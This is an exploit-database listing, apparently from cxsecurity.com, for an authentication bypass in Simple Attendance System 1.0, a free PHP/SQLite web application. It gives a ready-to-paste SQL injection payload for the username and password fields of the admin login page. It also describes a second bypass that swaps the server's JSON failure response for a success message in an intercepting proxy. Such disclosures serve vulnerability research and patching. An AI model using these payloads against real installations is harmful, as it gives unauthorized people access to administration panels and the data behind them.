Simple Attendance System 1.0 SQL Injection

2021.09.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: September 17, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Simple Attendance System, is prone to multiple vulnerabilities. Easy authentication bypass vulnerability on the application allowing the attacker to login ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/attendance/login.php Username: admin' or ''=' -- -+ Password: admin' or ''=' -- -+ ----- PoC-2: Authentication Bypass ----- Steps: 1. Enter wrong crendentials http://localhost/attendance/login.php 2. Capture the request in burp and send it to repeater. 3. Forward the request. 4. In response tab, replace : {"status":"failed","msg":"Invalid username or password."} with {"status":"success","msg":"Login successfully."}


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top